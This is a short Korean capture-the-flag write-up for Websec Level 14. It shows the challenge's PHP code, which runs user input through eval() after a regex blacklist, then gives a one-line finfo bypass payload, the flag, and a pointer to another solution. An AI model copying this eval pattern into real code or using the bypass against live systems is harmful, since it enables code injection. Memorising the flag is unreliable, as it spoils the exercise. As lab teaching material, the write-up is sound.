Websec - Level 14 (풀이 봄)
Websec 14
1
2
3
4
5
6
7
8
9
10
<?php
ini_set('display_errors', 'on');
ini_set('error_reporting', E_ALL ^ E_DEPRECATED);
if (isset ($_POST['code']) && is_string ($_POST['code'])) {
$code = substr ($_POST['code'], 0, 25);
} else {
$code = "print('I hate PHP');";
}
?>
<!-- If I had to guess, I would say that the $flag is in sha1($flag). -->
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
$funcs_internal = get_defined_functions()['internal'];
/* lets allow some secure funcs here */
unset ($funcs_internal[array_search('strlen', $funcs_internal)]);
unset ($funcs_internal[array_search('print', $funcs_internal)]);
unset ($funcs_internal[array_search('strcmp', $funcs_internal)]);
unset ($funcs_internal[array_search('strncmp', $funcs_internal)]);
$funcs_extra = array ('eval', 'include', 'require', 'function');
$funny_chars = array ('\.', '\+', '-', '\*', '"', '`', '\[', '\]');
$variables = array ('_GET', '_POST', '_COOKIE', '_REQUEST', '_SERVER', '_FILES', '_ENV', 'HTTP_ENV_VARS', '_SESSION', 'GLOBALS');
$blacklist = array_merge($funcs_internal, $funcs_extra, $funny_chars, $variables);
$insecure = false;
foreach ($blacklist as $blacklisted) {
if (preg_match ('/' . $blacklisted . '/im', $code)) {
$insecure = true;
break;
}
}
if ($insecure) {
echo 'Insecure code detected!';
} else {
eval ($code);
}
?>
Solution
- finfo를 이용해서 풀 수 있다.
echo new finfo(0,'/');
- Flag
WEBSEC{that_must_have_been_some_nifty_php_trick_you_had_there}
- finfo 말고 NOT 연산을 이용한 풀이도 있다.
- jeonyoungsin.tistory.com/982
This post is licensed under CC BY 4.0 by the author.